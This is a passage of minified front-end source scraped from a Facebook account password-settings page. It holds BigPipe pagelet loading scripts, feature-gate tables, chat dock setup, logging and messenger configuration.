9gSXonEK94SJbVDuoLSgqS0Dkh4vrerSG":{result:false,hash:"AT4jPFmU_XyiZdsT"},"AT4oK_7JC5TTZYywhfbwFBQ7pWrCP25GhIYJYeTXORatm7YiPEPnzywhysM8xfJZufAO5vBilwUW96zDpBUM53et41qE6E73Q_2-qy7gqb5uKw":{result:true,hash:"AT5ujYoUrg87PFav"},"AT6iNStHonlQ3Fxd6uDFsCdh9nK1aEQGITRpY8VW6YV7oDxq_dR3HvFer90h-mdnCx3qFFu4PhZAPIrHV8gyw531":{result:false,hash:"AT75qyZ6J9cer_u5"},"AT6c8BUV0FlnNMHF4dTuPa731A4LhQjSJAqfyTYk-MXPLzHY50LC9NwsoS7y-tDTDPUT7Szoe62iHMZL9uPPz8SI":{result:false,hash:"AT45mD2t_dK_V-s2"},"AT5cptvyk3v4q-mPX6FvPR1r8kJdnP0MgzuDdVra8DpZXuiu89qXhkgPD7OKcZn2j9_1ar1-0wqcgyg_FLY_IdusNDUe63z-hD6N3VThwJfBrw":{result:true,hash:"AT7ULZFTxBC7Q4sI"},AT62ojn41xLdDzte74igQHKCvhNbjzVlg7Mqtf_NPyGWcc3hsqsjlDziE5T1_FG2OvTDtt0aFUYmKbuuIJNlQLTz:{result:true,hash:"AT4TiXBmQHAQZalL"},AT4JzxHQIxRND8Kmb4P0ZKgRZIAtL9c6D4Sb7E0b1oCDX0oYcMUrO_8NRrEgEKcOrnd9zWa26WQWQYrttYx8SZzBTB7PEFVsuhlrNpYaHcKJ5Q:{result:true,hash:"AT6NPai-T1BIyiBC"},"AT7Y9hnWd5pbilzcl7lFh32-HD7EMVlcWgz9JemtXl1pgkaX7DJkV5ufEAhC7zBlQbW0rRmqr3VoprtLWKzJrk02":{result:false,hash:"AT4oSu2yK5f0oQmb"},"AT5YwWzPpBqGWxWxmCm_Xae-HTiebaJe74HJ7TYR6q_aBeghtAaEx4Ea5jA1WWazBhO-QMN0NVfuza-4Qnos5TBmygKFjbsq2knwkA9fMlQoLg":{result:false,hash:"AT51kQ4-w1FiG9jH"},"AT7ApUZVTaeaFVAZosDCyoYg5jewu8k9nTInty9zhgPcbA_qZ0Wekm54rZEtV5zN2fziN-IbrpdI7b9TIq2nwd-2KJh-lL261Q2BabnaLjE70g":{result:false,hash:"AT4D7tgGJryt-Kkw"},AT4KGYcd4g4uwaYpLCQCA7WH27AHxWarELGmGYkH0BZYEbzOIBM2B4taV2c0jQCfEMmQadsTgzuVA6xxFZlOzF1p:{result:false,hash:"AT5s5781QppyyEu0"},"AT4FCWD9S53UDtOrRSY9Zx7NzsoO-pBlAiTb5YSo3lCjpTsQt4JukbLnEU-rTpIzW3xv20NfAhwK6KX23Gc_jkLjRFQezUbT8rHyoNBpyHYVuA":{result:false,hash:"AT41LcELsY15IGnl"},"AT7ZhC0bT2qaKKrqqUClaYz5cxMNLW9luFxLLcju-HrYV9zpmyoz0rLE7KCckHU0dv1poI1iLtE9paBLdvxf2Tz3pNXZ-MipnoYwsHvuNe_ilw":{result:false,hash:"AT6N-1Sh5jwqHgkF"},"AT6iI7ZM-DEUqLyzH0WIG7tai1ljdAuMyZ79cNQA7lTOnZyBqjqwUgFPVt96-L_E3U8HkpYLqVG1H03r2SDZc5ot":{result:false,hash:"AT7ODe6fztnMb6K5"},AT6oc7waDZylzpc3VYE_6rY1fMXqV4112W4Pt03A2rYgjMxsF7XhLG1ym7PYIfgZ8NthtfNOIpZ_FWgG4DjVX4MSgzAcIPXlF0SCBRkskAcsOg:{result:true,hash:"AT4HxppC_LGjuWtv"},"AT40M32z8lGGJCQ8BdpTKBKW7c04XyOQ5frn2-EF3H5yLFnMqCUjJXNKrWFmzea4OX3v4yubJZaoRWQAybsxXQJO":{result:true,hash:"AT6QddcfPnT2_q8e"},"AT5U3uc-KVfuFEJ95IaYPQpi43ZNpaIaZMGFIk5gJ_VmF6Mfe-rnrbWZu0r9VYsjJKOr5t8XxIuf1j74QUYM0xpB":{result:true,hash:"AT5D3kgLZYZyxpNj"},"AT4ODvPnoizcT_rSyPM_kr8o-uYuC8LB-SGtzjxzVa7DZrGz9bNbuK7XK_MPFJ_Jv4-fN4mVJeHWCzk4k0w1FTVH":{result:true,hash:"AT6KUqsVFyJ_Sp6K"},"AT4fYz6-EGGUgvyAFfx6l7YSfZ7cm8o38gmWbQKe3dar4CzesGta_hgB442DTXOu3G0jCh8vHu33BDEIFvAwLYir":{result:true,hash:"AT5fPIF5d5ZqRiUB"},AT5Vk6SIJNYhRNht6t3dSXuMcJHrIAcE8oGUm6ucSsY4spj2_mjNkw4I6shZAzSklNKSIYkWjhBbQcGAGNmmKdA7:{result:true,hash:"AT4CjtdRAMtZAPHw"},"AT7HjiDwnMVL3AIA8BSudVOFxA-IzyrieUd8NdxFJOoIjXI3kpzXujbNr99ZiCMNBY0PFFBmtxsMTVC_JOHwUWMQ_JsNoMIejCjR_HtHsnVnTA":{result:false,hash:"AT5MuiKs10f7WicP"}},allResources:["AYvAm","Bee0v","IO8eo","MbCGD","BEw9R","vjHYq","/NvwD","uSKfe","AfZgB","rzQjB","q+9No","2dbAx","sQ7ef","np5Vl","rdSEf","zpNP2","kHLQg","HDFmP","0Klmq","XZrv9","onpAC","+8tRp","dIFKP","wsPMx","FolRP","Rg3pD","Pfi8i","jAeyQ"],displayResources:["AYvAm","Bee0v","AfZgB","sQ7ef","kHLQg","HDFmP","+8tRp","Rg3pD","Pfi8i","jAeyQ"],jsmods:{instances:[["__inst_7aaa629a_0_0",["ContextualDialog","ContextualDialogArrow","XUIAmbientNUXTheme","LayerFadeOnShow","LayerFadeOnHide","DialogHideOnSuccess","LayerDestroyOnHide","LayerHideOnTransition","LayerRemoveOnHide","ContextualLayerInlineTabOrder","__markup_a588f507_0_0"],[{width:300,context:null,contextID:"u_0_14",contextSelector:null,dialogRole:"region",labelledBy:"u_0_15",position:"above",alignment:"left",offsetX:0,offsetY:0,arrowBehavior:{__m:"ContextualDialogArrow"},hoverShowDelay:null,hoverHideDelay:null,theme:{__m:"XUIAmbientNUXTheme"},addedBehaviors:[{__m:"LayerFadeOnShow"},{__m:"LayerFadeOnHide"},{__m:"DialogHideOnSuccess"},{__m:"LayerDestroyOnHide"},{__m:"LayerHideOnTransition"},{__m:"LayerRemoveOnHide"},{__m:"ContextualLayerInlineTabOrder"}]},{__m:"__markup_a588f507_0_0"}],2],["__inst_ff9b4259_0_0",["ReactNub","__elem_a588f507_0_c","KeyboardShortcutFlyout.react"],[{__m:"__elem_a588f507_0_c"},{__m:"KeyboardShortcutFlyout.react"}],1],["__inst_a8285224_0_0",["BuddyListNub","__elem_a8285224_0_0","__inst_012ab79b_0_1","__elem_a588f507_0_f","__elem_a588f507_0_g"],[{__m:"__elem_a8285224_0_0"},{__m:"__inst_012ab79b_0_1"},{__m:"__elem_a588f507_0_f"},{__m:"__elem_a588f507_0_g"}],1],["__inst_6d41db38_0_1",["ScrollableArea","__elem_6d41db38_0_1"],[{__m:"__elem_6d41db38_0_1"},{persistent:true,shadow:false}],1],["__inst_012ab79b_0_1",["ChatOrderedList","__elem_012ab79b_0_1"],[false,{__m:"__elem_012ab79b_0_1"},null,false],2],["__inst_fa0b3e92_0_0",["ChatTabTypeaheadDataSource"],[{queryEndpoint:"/ajax/mercury/composer_query.php",bootstrapEndpoint:"",alwaysPrefixMatch:true,enabledLocalCache:true,enabledMergeUids:true,disableAllCaches:false,globalKeywordsEndpoint:"",enforceNewRequestIDUponFetch:false}],1],["__inst_fa0b3e92_0_1",["ChatTabTypeaheadDataSource"],[{queryEndpoint:"/ajax/mercury/composer_query.php",bootstrapEndpoint:"",alwaysPrefixMatch:true,enabledLocalCache:true,enabledMergeUids:true,disableAllCaches:false,globalKeywordsEndpoint:"",enforceNewRequestIDUponFetch:false}],1],["__inst_10011657_0_0",["MercuryAudienceRestrictedTypeaheadDataSource"],[{queryEndpoint:"/ajax/chat/restricted_user_info.php",bootstrapEndpoint:"",alwaysPrefixMatch:true,enabledLocalCache:true,enabledMergeUids:true,disableAllCaches:false,globalKeywordsEndpoint:"",enforceNewRequestIDUponFetch:false}],1]],markup:[["__markup_a588f507_0_0",{__html:"\\x3Cdiv>\\x3Cdiv class=\\"_53iv\\">\\x3Cdiv class=\\"_21es\\">\\x3Cbutton class=\\"_42ft _5upp _50zy layerCancel _36gl _50-0 _50z_\\" type=\\"button\\" title=\\"Remove\\">Remove\\x3C/button>\\x3Cdiv class=\\"__xn\\">See available keyboard shortcuts here.\\x3C/div>\\x3C/div>\\x3Cdiv aria-label=\\"Learn about keyboard shortcuts\\" id=\\"u_0_15\\">\\x3C/div>\\x3Cdiv role=\\"alert\\" class=\\"accessible_elem\\">Tab to access contents in the dialogue\\x3C/div>\\x3C/div>\\x3Ca aria-label=\\"Close\\" class=\\"layer_close_elem accessible_elem\\" href=\\"#\\" role=\\"button\\" id=\\"u_0_16\\" aria-labelledby=\\"u_0_16 u_0_15\\">\\x3C/a>\\x3C/div>"},1]],elements:[["__elem_a8285224_0_0","fbDockChatBuddylistNub",1],["__elem_a588f507_0_g","u_0_17",1],["__elem_a588f507_0_h","u_0_18",1],["__elem_6d41db38_0_1","u_0_19",1],["__elem_a588f507_0_i","u_0_1a",1],["__elem_012ab79b_0_1","u_0_1b",1],["__elem_a588f507_0_f","u_0_1c",2],["__elem_a588f507_0_j","u_0_1d",1],["__elem_31f7c21e_0_0","u_0_1e",1],["__elem_a588f507_0_l","u_0_1f",1],["__elem_a588f507_0_k","u_0_1g",1],["__elem_a588f507_0_m","u_0_1h",1],["__elem_a588f507_0_n","u_0_1i",1],["__elem_20081362_0_0","u_0_1j",1],["__elem_a588f507_0_d","u_0_1k",1],["__elem_a588f507_0_c","u_0_1l",1],["__elem_a588f507_0_e","u_0_1m",1],["__elem_9f5fac15_0_5","ChatTabsPagelet",1],["__elem_9f5fac15_0_4","BuddylistPagelet",1],["__elem_a588f507_0_o","u_0_1n",1]],require:[["ConversationNotificationListeners","initialize",[],[]],["__inst_7aaa629a_0_0"],["KeyboardShortcuts","initNUXEvent",["__inst_7aaa629a_0_0"],[{__m:"__inst_7aaa629a_0_0"},5849]],["Dock","init",["__elem_20081362_0_0"],[{__m:"__elem_20081362_0_0"}]],["__inst_ff9b4259_0_0"],["ScrollBoundaryContain","applyToElem",["__elem_a588f507_0_d"],[{__m:"__elem_a588f507_0_d"}]],["DockNubs","init",["__elem_a588f507_0_e"],[{__m:"__elem_a588f507_0_e"}]],["ChatOptions"],["ChatTypeaheadCore","init",["__elem_a588f507_0_f"],[{__m:"__elem_a588f507_0_f"},"100022900869586",false]],["__inst_a8285224_0_0"],["ScrollBoundaryContain","applyToElem",["__elem_a588f507_0_h"],[{__m:"__elem_a588f507_0_h"}]],["__inst_6d41db38_0_1"],["ScrollBoundaryContain","applyToElem",["__elem_a588f507_0_i"],[{__m:"__elem_a588f507_0_i"}]],["__inst_012ab79b_0_1"],["FantaTabsSlimApp","init",["__elem_a588f507_0_j","__elem_31f7c21e_0_0"],[{__m:"__elem_a588f507_0_j"},{__m:"__elem_31f7c21e_0_0"},{initial_data:[],interstitial_data:[],graphql_payload:{threads:[],message_blocked_ids:["fbid:100026522378850"],message_ignored_ids:["fbid:100026522378850"],payload_source:"server_initial_data",viewer:"100022900869586",is_page:false}}]],["FantaTabsEagerBootloader"],["FantaTabActions"],["P2PDialogContainerMount","mount",["__elem_a588f507_0_k"],[{__m:"__elem_a588f507_0_k"}]],["MNCommerceDialogContainerMount","mount",["__elem_a588f507_0_l"],[{__m:"__elem_a588f507_0_l"}]],["PagesPlatformDialogContainerMount","mount",["__elem_a588f507_0_m"],[{__m:"__elem_a588f507_0_m"}]],["FBPaymentsDialogContainerMount","mount",["__elem_a588f507_0_n"],[{__m:"__elem_a588f507_0_n"}]],["FBRTCCallSummaryUploader","init",[],[]],["NotificationBeeperContainer","renderBeeper",["__elem_a588f507_0_o"],[{soundPath:["https://static.xx.fbcdn.net/rsrc.php/yQ/r/EE3t4uwM6Gd.ogg","https://static.xx.fbcdn.net/rsrc.php/yF/r/NJ17yOPKZOV.mp3"],soundEnabled:true,tracking:"{\\"ref\\":\\"beeper\\",\\"jewel\\":\\"notifications\\",\\"type\\":\\"click2canvas\\",\\"fbsource\\":\\"1001\\"}"},{__m:"__elem_a588f507_0_o"}]]],contexts:[[{__m:"__elem_9f5fac15_0_4"},false],[{__m:"__elem_9f5fac15_0_5"},false]],define:[]},content:{pagelet_dock:{container_id:"u_0_1o"}},id:"pagelet_dock",phase:62,all_phases:[63,62]});}),"onPageletArrive pagelet_dock",{"root":true,"pagelet":"pagelet_dock"})(); </script> <div class="hidden_elem"> </div> <script> bigPipe.beforePageletArrive("fbRequestsList_wrapper") </script> <script> require("TimeSlice").guard((function(){bigPipe.onPageletArrive({allResources:["Bee0v","IO8eo","MbCGD","vjHYq","/NvwD","rdSEf","zpNP2","2dbAx","jAeyQ","sQ7ef","wsPMx"],displayResources:["Bee0v","jAeyQ","sQ7ef"],jsmods:{require:[["RequestsJewelController","maybeLoadJewel",[],[]],["RequestsJewelController","setupJewelRefresh",[],[]]],define:[]},content:{fbRequestsList_wrapper:{container_id:"u_0_1p"}},id:"fbRequestsList_wrapper",phase:62,last_in_phase:true,last_pagelet:true,all_phases:[63,62],tti_phase:62});}),"onPageletArrive fbRequestsList_wrapper",{"root":true,"pagelet":"fbRequestsList_wrapper"})(); </script> <script> bigPipe.beforePageletArrive("last_response") </script> <script> require("TimeSlice").guard((function(){bigPipe.onPageletArrive({resource_map:{FEt5G:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yc/r/LqMiRipdJAD.js",crossOrigin:1}},gkxData:{"AT5I7mwnOjJSN4YBC80MgAt38eU-7OadZwL8IHlpEkxMmpoYYYZrLOVGKNcCBEwzQuRw0zqwrNWuAz59Ta_T9tf9k5-AwZmdheroGQx2wKucOw":{result:false,hash:"AT7-5K8vAsF-Ecsw"}},allResources:["Bee0v","sQ7ef","MbCGD","jAeyQ","IO8eo","NmVPR","dIFKP","Adbbx","C/4sM","rzQjB","zpNP2","Xxho8","q+9No","5p2rH","ldHu6","np5Vl","rdSEf","L4sg3","onpAC","87rxF","7aYsk","hv63h","j4Op8","BEw9R","XZrv9","/NvwD","NHGTD","P5aPI","kHLQg","j4Ljx","utT+H","72OwO","0n0v6","27fPb","D0Bd3","IEK7S","Pfi8i","vjHYq","uSKfe","P/mr5","nvklr","FEt5G"],displayResources:["Bee0v","sQ7ef","MbCGD","jAeyQ","IO8eo","NmVPR","dIFKP","C/4sM","rzQjB","zpNP2","Xxho8","q+9No","5p2rH","ldHu6","np5Vl","rdSEf","7aYsk","j4Op8","/NvwD","NHGTD","kHLQg","j4Ljx","utT+H","72OwO","0n0v6","27fPb","D0Bd3","IEK7S","Pfi8i","P/mr5"],onafterload:["CavalryLogger.getInstance(\\"6568014334500785022-0\\").collectBrowserTiming(window)","window.CavalryLogger&&CavalryLogger.getInstance().setTimeStamp(\\"t_paint\\");","if (window.ExitTime){CavalryLogger.getInstance(\\"6568014334500785022-0\\").setValue(\\"t_exit\\", window.ExitTime);};"],id:"last_response",phase:63,jsmods:{require:[["CavalryLoggerImpl","startInstrumentation",[],[]],["NavigationMetrics","setPage",[],[{page:"WebSecurityPasswordSettingController",page_type:"normal",page_uri:"https://www.facebook.com/settings?tab=security&section=password&view",serverLID:"6568014334500785022-0"}]],["Chromedome","start",[],[[]]],["SyntaxErrorMonitor","init",[],[{bump_freq_day:1,cookie_ttl_sec:604800,cdn_config:"secure:1"}]],["DimensionTracking"],["HighContrastMode","init",[],[{isHCM:false,spacerImage:"https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/-PAXP-deijE.gif"}]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[100022900869586,"c_user"]],["TimeSlice","setLogging",[],[false,0.01]],["NavigationClickPointHandler"],["Artillery","disable",[],[]],["ArtilleryOnUntilOffLogging","disable",[],[]],["ArtilleryRequestDataCollection","disable",[],["6568014334500785022-0"]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["ArtilleryRequestDataCollection","init",[],[]]],define:[["QuicklingConfig",[],{version:"4017402;0;",sessionLength:30,inactivePageRegex:"^/(fr/u\\\\.php|ads/|advertising|ac\\\\.php|ae\\\\.php|a\\\\.php|ajax/emu/(end|f|h)\\\\.php|badges/|comments\\\\.php|connect/uiserver\\\\.php|editalbum\\\\.php.+add=1|ext/|feeds/|help([/?]|$)|identity_switch\\\\.php|isconnectivityahumanright/|intern/|login\\\\.php|logout\\\\.php|sitetour/homepage_tour\\\\.php|sorry\\\\.php|syndication\\\\.php|webmessenger|/plugins/subscribe|lookback|brandpermissions|gameday|pxlcld|worldcup/map|livemap|work/admin|([^/]+/)?dialog)|legal|\\\\.pdf$",badRequestKeys:["nonce","access_token","oauth_token","xs","checkpoint_data","code"],logRefreshOverhead:false},60],["PageletGK",[],{destroyDomAfterEventHandler:false,skipClearingChildrenOnUnmount:true},2327],["QuicklingFetchStreamConfig",[],{experimentName:"none",bluebarTransitionElement:"bluebarRoot",bluebarTransitionClass:"transitioning"},2872],["WebStorageMonsterLoggingURI",[],{uri:"/ajax/webstorage/process_keys/"},3032],["AccessibilityExperimentsConfig",[],{a11yKeyboardShortcutNub:true},3324],["BusinessUserConf",[],{businessUserID:null},1440],["BrowserPushStrings",[],{title:"Facebook",turn_on:"Turn on Facebook notifications",explanation:"See your notifications in the corner of your computer screen, even when Facebook is closed.",explanation_web_notifications:"See your notifications in the corner of your computer screen while you're using your browser."},2218],["LocaleInitialData",[],{locale:"en_GB",language:"English (UK)"},273],["GraphQLSubscriptionsConfig",[],{shouldAlwaysLog:false,shouldUseGraphQL2DocumentIDs:true},2469],["RTISubscriptionGateLoader",["RTISubscriptionManager"],{gkUseIcebreaker:false,icebreakerWhitelist:[],module:{__m:"RTISubscriptionManager"}},2594],["WebGraphQLConfig",[],{timeout:30000,use_timeout_handler:true,use_error_handler:true},2809],["MercuryMessengerJewelPerfConfig",[],{bundleBootloader:true,eagerLoadingOnInteraction:true},2632],["FunnelLoggerConfig",[],{freq:{WWW_ESCALATION_TOOLS_NOTIFICATIONS_PAGE_FUNNEL:1,WWW_ONCALL_VIEW_FUNNEL:1,WWW_MESSENGER_GROUP_ESCALATION_FUNNEL:1,WWW_SPATIAL_REACTION_PRODUCTION_FUNNEL:1,CREATIVE_STUDIO_CREATION_FUNNEL:1,WWW_CANVAS_AD_CREATION_FUNNEL:1,WWW_CANVAS_EDITOR_FUNNEL:1,WWW_LINK_PICKER_DIALOG_FUNNEL:1,WWW_MEME_PICKER_DIALOG_FUNNEL:1,WWW_LEAD_GEN_FORM_CREATION_FUNNEL:1,WWW_LEAD_GEN_FORM_EDITOR_FUNNEL:1,WWW_LEAD_GEN_DESKTOP_AD_UNIT_FUNNEL:1,WWW_LEAD_GEN_MSITE_AD_UNIT_FUNNEL:1,WWW_CAMPFIRE_COMPOSER_UPSELL_FUNNEL:1,WWW_PMT_FUNNEL:1,WWW_RECRUITING_PRODUCTS_ATTRIBUTION_FUNNEL:1,WWW_RECRUITING_PRODUCTS_FUNNEL:1,WWW_RECRUITING_SEARCH_FUNNEL:1,WWW_EXAMPLE_FUNNEL:1,WWW_REACTIONS_BLINGBAR_NUX_FUNNEL:1,WWW_REACTIONS_NUX_FUNNEL:1,WWW_COMMENT_REACTIONS_NUX_FUNNEL:1,WWW_MESSENGER_SHARE_TO_FB_FUNNEL:10,POLYGLOT_MAIN_FUNNEL:1,MSITE_EXAMPLE_FUNNEL:10,WWW_FEED_SHARE_DIALOG_FUNNEL:100,MSITE_AD_BREAKS_ONBOARDING_FLOW_FUNNEL:1,MSITE_FEED_ALBUM_CTA_FUNNEL:10,MSITE_FEED_SHARE_DIALOG_FUNNEL:100,MSITE_COMMENT_TYPING_FUNNEL:500,MSITE_HASHTAG_PROMPT_FUNNEL:1,WWW_SEARCH_AWARENESS_LEARNING_NUX_FUNNEL:1,WWW_CONSTITUENT_TITLE_UPSELL_FUNNEL:1,MTOUCH_FEED_MISSED_STORIES_FUNNEL:10,WWW_UFI_SHARE_LINK_FUNNEL:1,WWW_CMS_SEARCH_FUNNEL:1,GAMES_QUICKSILVER_FUNNEL:1,SOCIAL_SEARCH_CONVERSION_WWW_FUNNEL:1,SOCIAL_SEARCH_DASHBOARD_WWW_FUNNEL:1,SRT_USER_FLOW_FUNNEL:1,MSITE_PPD_FUNNEL:1,WWW_PAGE_CREATION_FUNNEL:1,NT_EXAMPLE_FUNNEL:1,WWW_LIVE_VIEWER_TIPJAR_FUNNEL:1,FACECAST_BROADCASTER_FUNNEL:1,WWW_FUNDRAISER_CREATION_FUNNEL:1,WWW_FUNDRAISER_EDIT_FUNNEL:1,WWW_OFFERS_SIMPLE_COMPOSE_FUNNEL:1,QP_TOOL_FUNNEL:1,WWW_OFFERS_SIMPLE_COMPOSE_POST_LIKE_FUNNEL:1,COLLEGE_COMMUNITY_NUX_ONBOARDING_FUNNEL:1,CASUAL_GROUP_PICKER_FUNNEL:1,TOPICS_TO_FOLLOW_FUNNEL:1,WWW_MESSENGER_SEARCH_SESSION_FUNNEL:1,WWW_LIVE_PRODUCER_FUNNEL:1,FX_PLATFORM_INVITE_JOIN_FUNNEL:1,CREATIVE_STUDIO_HUB_FUNNEL:1,WWW_SEE_OFFERS_CTA_NUX_FUNNEL:1,WWW_ADS_TARGETING_AUDIENCE_MANAGER_FUNNEL:1,WWW_AD_BREAKS_ONBOARDING_FUNNEL:1,WWW_AD_BREAK_HOME_ONBOARDING_FUNNEL:1,WWW_NOTIFS_UP_NEXT_FUNNEL:10,ADS_VIDEO_CAPTION_FUNNEL:1,KEYFRAMES_FUNNEL:500,SEARCH_ADS_WWW_FUNNEL:1,WWW_ALT_TEXT_COMPOSER_FUNNEL:1,BUSINESS_PAYMENTS_MERCHANT_ONBOARDING_FUNNEL:1,MERCHANT_PAYMENTS_MERCHANT_ONBOARDING_FUNNEL:1,WWW_BUSINESS_CREATION_FUNNEL:1,WWW_APP_REVIEW_BUSINESS_VERIFICATION_FUNNEL:1,SELLER_EXPERIENCE_PAYOUT_SETUP_FUNNEL:1,PAYOUT_ONBOARDING_FUNNEL:1,SERVICES_INSTANT_BOOKING_SETTINGS_FUNNEL:1,SERVICES_FB_APPOINTMENTS_CTA_CREATION_FUNNEL:1,FB_NEO_ONBOARDING_FUNNEL:1,FB_NEO_FRIENDING_FUNNEL:1,WWW_MESSENGER_CONTENT_SEARCH_FUNNEL:1,SEARCH_FUNNEL:1,UNIDASH_EDIT_WIDGET_FUNNEL:1,PRIVATE_COMMENT_COMPOSER_FUNNEL:1,WEB_RTC_SCREEN_SHARING_FUNNEL:1,CHECKOUT_EXPERIENCES_FUNNEL:1,CHECKOUT_EXPERIENCES_SELLER_FUNNEL:1,WWW_SERVICES_INSTANT_BOOKING_CONSUMER_FUNNEL:1,WWW_SERVICES_BOOK_APPOINTMENT_CONSUMER_FUNNEL:10,WWW_SPHERICAL_DIRECTOR_FUNNEL:1,NATIVE_SUPPORT_FUNNEL:1,WWW_PRESENCE_FUNNEL:1,MESSENGER_UNIVERSAL_SEARCH_FUNNEL:1,MESSENGER_SECONDARY_SEARCH_FUNNEL:1,PRIVACY_SHORTCUTS_FUNNEL:1,PRIVACY_ACCESS_HUB_FUNNEL:1,WWW_POLITICIAN_OFFICE_SETTING_FUNNEL:1,WWW_CIVIC_ACTION_POST_INVITE_FUNNEL:1,WWW_MESSENGER_SHARE_FILE_PREVIEW_FUNNEL:1,ALL_VOICES_FUNNEL:1,AEC_APPLICATION_FUNNEL:1,INSTANT_EXPERIENCES_MINDBODY_FUNNEL:1,WWW_LAUNCHPAD_ONBOARDING_FUNNEL:1,default:1000}},1271],["MarauderConfig",[],{app_version:"4017402",gk_enabled:false},31],["NotificationListConfig",[],{canMarkUnread:true,canMarkUnreadInHub:true,isWork:false,numStoriesFromEndBeforeAFetchIsTriggered:5,updateWhenPaused:false,useStreamingTransport:true,jsBootloadDelay:0,eagerLoadDelayInMs:0,jsBootloadTrigger:"bigpipe_display_done",numNotificationsPerPage:15,requestFullViewportOfNotificationsOnFirstOpen:true,dataEagerFetchTrigger:"none",dataPreloader:null,scrollToFetchThrottleInsteadOfDebounce:true,sessionID:"c829823e-ddd3-45c8-3e05-7eba66b54348",reactFiberAsyncNotifications:false,eagerRenderJewel:false,eagerOnBadgeUpdate:false,eagerOnBadgeIncreaseFromZero:false,jewelClickPrediction:0.038736775517464},2425],["RTISubscriptionManagerConfig",[],{config:{max_subscriptions:150,www_idle_unsubscribe_min_time_ms:600000,www_idle_unsubscribe_times_ms:{feedback_like_subscribe:600000,comment_like_subscribe:600000,feedback_typing_subscribe:600000,comment_create_subscribe:1800000,video_tip_jar_payment_event_subscribe:14400000},www_unevictable_topic_regexes:["^(graphql|gqls)/web_notification_receive_subscribe","^www/sr/hot_reload/"],autobot_tiers:{latest:"realtime.skywalker.autobot.latest",intern:"realtime.skywalker.autobot.intern",sb:"realtime.skywalker.autobot.sb"},max_subscription_flush_batch_size:100},autobot:\{},assimilator:\{},unsubscribe_release:true},1081],["SystemEventsInitialData",[],{ORIGINAL_USER_ID:"100022900869586"},483],["RTIFriendFanoutConfig",[],{passFriendFanoutSubscribeGK:true,topicPrefixes:["gqls/live_video_currently_watching_subscribe"]},2781],["CurrentEnvironment",[],{facebookdotcom:true,messengerdotcom:false},827],["MercuryFoldersConfig",[],{hide_message_filtered:false,hide_message_requests:false},1632],["MercuryMessengerBlockingUtils",[],{block_messages:"BLOCK_MESSAGES"},872],["MercuryParticipantsConstants",[],{UNKNOWN_GENDER:0,EMAIL_IMAGE:"/images/messaging/threadlist/envelope.png",IMAGE_SIZE:32,BIG_IMAGE_SIZE:50,WWW_INCALL_THUMBNAIL_SIZE:100},109],["MercuryThreadlistConstants",[],{CONNECTION_REQUEST:20,RECENT_THREAD_OFFSET:0,JEWEL_THREAD_COUNT:7,JEWEL_MORE_COUNT:10,WEBMESSENGER_THREAD_COUNT:20,WEBMESSENGER_MORE_COUNT:20,WEBMESSENGER_SEARCH_SNIPPET_COUNT:5,WEBMESSENGER_SEARCH_SNIPPET_LIMIT:5,WEBMESSENGER_SEARCH_SNIPPET_MORE:5,WEBMESSENGER_MORE_MESSAGES_COUNT:20,RECENT_MESSAGES_LIMIT:10,MAX_UNREAD_COUNT:99,MAX_UNSEEN_COUNT:99,MESSAGE_NOTICE_INACTIVITY_THRESHOLD:20000,GROUPING_THRESHOLD:300000,MESSAGE_TIMESTAMP_THRESHOLD:1209600000,SEARCH_TAB:"searchtab",MAX_CHARS_BEFORE_BREAK:280,MAX_PINNED_THREADS:15},96],["MessagingConfig",[],{SEND_CONNECTION_RETRIES:2,syncFetchRetries:2,syncFetchInitialTimeoutMs:1500,syncFetchTimeoutMultiplier:1.2,syncFetchRequestTimeoutMs:10000},97],["MessagingTagConstants",[],{app_id_root:"app_id:",other:"other",orca_app_ids:["200424423651082","181425161904154","105910932827969","256002347743983","202805033077166","184182168294603","237759909591655","233071373467473","436702683108779","684826784869902","1660836617531775","334514693415286","1517584045172414","483661108438983","331935610344200","312713275593566","770691749674544","1637541026485594","1692696327636730","1526787190969554","482765361914587","737650889702127","1699968706904684","772799089399364","519747981478076","522404077880990","1588552291425610","609637022450479","521501484690599","1038350889591384","1174099472704185","628551730674460","1104941186305379","1210280799026164","252153545225472","359572041079329"],chat_sources:["source:chat:web","source:chat:jabber","source:chat:iphone","source:chat:meebo","source:chat:orca","source:chat:light_speed","source:chat:test","source:chat:forward","source:chat"],mobile_sources:["source:sms","source:gigaboxx:mobile","source:gigaboxx:wap","source:titan:wap","source:titan:m_basic","source:titan:m_free_basic","source:titan:m_japan","source:titan:m_mini","source:titan:m_touch","source:titan:m_app","source:titan:m_zero","source:titan:api_mobile","source:buffy:sms","source:chat:orca","source:chat:light_speed","source:titan:orca","source:mobile"],email_source:"source:email"},2141],["MercuryServerRequestsConfig",[],{sendMessageTimeout:45000,msgrRegion:"ATN"},107],["MercuryConfig",[],{JewelRequestsUI:false,WMBF:false,messenger_platform_media_template:true,NFBW:false,DYIDeepLink:"https://facebook.com/dyi/?x=Adn0-L6B82CR_kVa&referrer=mercury_config",STICKER_SUBSCRIPTION_ENABLED:false,SearchMorePeople:2,MontageThreadViewer:true,msgr_region:"ATN",MessengerInboxRequests:false,MCMA:false,Unit:3,Duration:3,"roger.seen_delay":1000,activity_limit:60000,idle_limit:1800000,idle_poll_interval:300000,LOG_INTERVAL_MS:60000,MaxThreadResults:8,MessengerAppID:"237759909591655",upload_url:"https://upload.facebook.com/ajax/mercury/upload.php",WWWMessengerMontageLWR:false,WWWMessengerAttachmentMessageGK:false,Mentions:true,Reactions:true,SendReactions:true,ReactionsPreview:true,MEMI:true,WWWSyncHolesLogging:false,GDWC:false,MNFWD:false,MNNSS:false,MNNSSTFO:false,MNNBC:false,MNNNG:false,MNNDT:true,MessengerForwardButtonForSharedFilesGK:false,USSE:false,ShowInviteSurface:false,MessengerNewGroupParticipantSuggestionQE:false,ChatComposer:false,ChatGroupChat:false,MessengerGroupCreationUseMNetQE:false,MCER:false,DFFD:500,MNWNS:false,ShouldGameTextStartGame:false,ShouldGameIconStartGame:false,ShowBiggerGameIcon:false,ShouldReplaceWave:false,ShowSeeMoreForNewGameTab:false,ShowTwoTabsForNewGameTab:false},35],["DateFormatConfig",[],{numericDateOrder:["d","m","y"],numericDateSeparator:"/",shortDayNames:["Mon","Tues","Wed","Thurs","Fri","Sat","Sun"],timeSeparator:":",weekStart:6,formats:{D:"D","D g:ia":"D H:i","D M d":"j F","D M d, Y":"l, j F Y","D M j":"D, j M","D M j, g:ia":"j F H:i","D M j, 